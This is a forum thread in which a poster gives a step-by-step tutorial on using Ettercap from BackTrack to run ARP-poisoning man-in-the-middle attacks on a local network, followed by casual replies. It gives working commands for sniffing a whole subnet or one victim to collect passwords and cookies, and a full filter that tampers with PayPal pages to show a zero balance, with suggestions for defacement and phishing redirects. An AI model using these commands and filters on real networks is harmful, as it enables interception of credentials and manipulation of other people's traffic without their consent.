Ettercap And Indepth Tutorial

[Kalisthetics5569]

..:::ETTERCAP:::..


Tut by k0m1kaz33 (AKA Poizon)

Hello and welcome to this tutorial. I will be explaining all you need to know about Ettercap. Before I start I would like to say that this site is not a hacking website, and this tutorial is to be used for informational purposes ONLY

What is Ettercap?

"Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks.
It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis." In other words, Ettercap is a program that is used for running MITM (man in the middle) attacks on a local area network (LAN). Yes Ettercap runs under windows as well, but I mean hey, Linux is better. The program has many features including the ability to use filters, plug-ins, and more. It is like Cain and Abel, except that it is not for script kiddies...

Lets get started!

To start you will need Ettercap. You can get it here. I will not spend much time on explaining how to install the program, because this tut is intending you are using a Backtrack live DVD. You can get this from Remote-Exploit. I recommend downloading and burning the BT4 pre release. NOT THE BT4 BETA! That has errors. When you download the ISO, burn it to a DVD and then we will go from there.


Okay, so you burned the ISO to the DVD and you have it sitting next to your computer. Pop in the DVD and restart your computer. If you haven't done so, you will need to configure your computer to boot from CD. To do this, as your computer is booting up, press the specified key to load the BIOS (usually F12, F2, F6, or F8). After you have loaded your computers BIOS, go to the boot tab on the top and change the order of the boot. Now save your settings and restart the computer. If you are not a retard, and you did everything right, you should load Backtrack 4.


Now that Backtrack is loaded you should see this,

Now type in "startx" and it will load the GUI of backtrack. After this is done, you will want to configure your network settings. Open up a konsole and if you are like me and you are running wireless, type in "/usr/bin/start-network" and then after that go to the bottom left and open up the menu. Go to internet and select "WICD" and connect to your own network or the one you cracked from,

[SIZE=1]http://www.se7ensins.com/forums/misc-tutorials/129331-tut-hacking-wep-wifi-passwords-total-noob-guide.html[/SIZE]

(A little nooby but it works) Ok so now you are connected to your network, you may have to go back to console and type "dhclient". If you are not connected to the network OR if you are using a wired connection. Ok so now that you are connected to your network you will want to open up a console and start using Ettercap.

What Can We Do?

Well there are various things that we can do with this program. I will be using the CLI version of Ettercap and not the gui, because I think it is easier. Head on down to konsole, and then get ready for some poisoning!

Plain Old Etter

Im going to start with the easiest of the easy. Nothing out of the blue, just plain old capturing. I usually never do this because I run BT4 off a VM and if I just wanted to do regular capturing, I would open up Cain and just use that for capturing. But I will teach you anyways. So; now that you have a konsole window open go ahead and type in,

ettercap -T -q -i (interface) -L /root -M arp // //

-T (Text only interface)
-q (Quiet, only outputs important data, no bull****)
-i (Interface, eth0 for wired and wlan0, ath0, eth1 etc for wireless)
-L (Logs the data to a file. I find it useful if you are just capturing data, so you can go back and look for what you found)
-M (Type of attack, ARP)
// // (Target range [all in subnet])

Ok, so now that you have that started Ettercap should start popping up packets according to the victims requests, data, etc. This is very useful for collecting passwords and cookies.

Filters

One of my favorite parts of Ettercap. Ability to use filters. In newb words, filters are files that run with Ettercap to perform a specific job. Note that they are seperate to plugins, and are totally different. For example, you can write a filter that replaces text on a page with something else. (eg. You make a filter that replaces the text "you have $x in your account" with "you have $0 in your account. So when they go to paypal, they **** themselves.) Ok lets start with an example I made just for you.

############################################################################
#                                       #
#  Paypal Brownapants *** Based off of Jolly Pwned *** Filter source file  #
#                                  (Irongeek)                              #
#                                        #
#  Filter modified by k0m1kaz33 aka Poizon. Based off of Jolly Pwned from  #
#  http://www.irongeek.com                           #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("you have", "You have $0 in your account!" ");
msg("Filter Ran.\n");
}

Ok so you are going to want to copy this into a text editor and save it as *.filter. So head on over to any old text editor and paste the filter in. I prefer Kate (k-menu>utilities>kate-advanced text editor). Save this to your desktop and then open up another Konsole. Now it is time to compile the text filter file to an actual usable filter.

etterfilter paypal.filter -o paypal.ef

-o (Output file. In this case paypal.ef, but it can be changed)

Now that we have compiled the filter...

ettercap -T -q -i (interface) -F paypal.ef -L /root -M /192.168.1.101/ //

Mostly same parameters.
-F (Specifies what filter file to use)
Note that this time I am targeting one IP on the network by using the /x.x.x.x/ // command instead of the // // command. This targets only the IP 192.168.1.101

As you can see, there are many options you can have with filters. They are very useful and just require an imagination to use. Some ideas:

-Defacing pages

-Redirects to phishing sites (I would just use DNS_spoofing)

-And just for scaring people

But remember that this does require knowledge of some HTML/Java.

Plug-ins

Meh ill talk about plug-ins and dns_spoofing tomorrow. I'm tired of typing.

THIS TUT IS ALLOWED BECAUSE H20 PETE SAID SO!

You don't need your own consent durrrrrrrrrrr.

Yes post the thread! That would be useful

Thanks

Dedicated to Carson because he taught me how to use RFI (WS)
​

 

[n00bFRAGGER]

Dedicated to Carson because he taught me how to use RFI (WS)

Haha I love RFIs!

Good post, will definitely read more into this when I get the time.

 

[Kalisthetics5569]

Thanks I spent like 12 hrs doing this because I had to reformat and make a VM of bt and the works. But its kind of sad how no body looks in the linux section

 

[n00bFRAGGER]

Eh this forum was never a Linux based community.

 

[Kalisthetics5569]

Lol doesnt even seem like a hacking community xD

 

[n00bFRAGGER]

lol thats because we all grew up

 

[Kalisthetics5569]

I could show a great argument with that. But I will keep to myself

 

[n00bFRAGGER]

I just laughed.

The people who actually contributed to our hacking aspect grew up.

 

[Kalisthetics5569]

So basically the halo skids are too nooby to understand and the non halo noobs just dont care.